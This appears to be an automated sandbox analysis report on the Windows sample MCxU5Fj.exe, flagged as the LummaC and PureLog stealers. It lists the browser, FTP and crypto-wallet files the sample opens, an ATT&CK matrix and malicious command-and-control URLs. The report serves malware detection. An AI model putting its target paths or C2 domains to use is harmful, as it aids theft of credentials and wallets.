Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: MCxU5Fj.exe PID: 7528, type: MEMORYSTR
Source: Yara match	File source: 2.2.MCxU5Fj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MCxU5Fj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2650627998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: MCxU5Fj.exe, type: SAMPLE
Source: Yara match	File source: 0.2.MCxU5Fj.exe.4339550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.MCxU5Fj.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1406285774.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MCxU5Fj.exe	58%	Virustotal		Browse
MCxU5Fj.exe	66%	ReversingLabs	Win32.Trojan.Nekark

Source	Detection	Scanner	Label
https://circujitstorm.bet/api	100%	Avira URL Cloud	malware
https://circujitstorm.bet/	100%	Avira URL Cloud	malware
https://circujitstorm.bet:443/api	100%	Avira URL Cloud	malware
https://circujitstorm.bet/apiPP5	100%	Avira URL Cloud	malware
phygcsforum.life	100%	Avira URL Cloud	malware
https://circujitstorm.bet:443/apiMicrosoft	100%	Avira URL Cloud	malware
moderzysics.top	100%	Avira URL Cloud	malware
circujitstorm.bet	100%	Avira URL Cloud	malware
https://circujitstorm.bet/api9	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
circujitstorm.bet	188.114.97.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://circujitstorm.bet/api	true	Avira URL Cloud: malware	unknown
moderzysics.top	true	Avira URL Cloud: malware	unknown
techspherxe.top	false		high
phygcsforum.life	true	Avira URL Cloud: malware	unknown
circujitstorm.bet	true	Avira URL Cloud: malware	unknown
techmindzs.live	false		high
gadgethgfub.icu	false		high
codxefusion.top	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://circujitstorm.bet/apiPP5	MCxU5Fj.exe, 00000002.00000002.2651557958.0000000001147000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://circujitstorm.bet:443/api	MCxU5Fj.exe, 00000002.00000002.2651192827.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx	MCxU5Fj.exe, 00000002.00000002.2651110601.000000000109C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://circujitstorm.bet/	MCxU5Fj.exe, 00000002.00000002.2651557958.0000000001147000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://circujitstorm.bet:443/apiMicrosoft	MCxU5Fj.exe, 00000002.00000002.2651192827.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://circujitstorm.bet/api9	MCxU5Fj.exe, 00000002.00000002.2651363380.00000000010E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
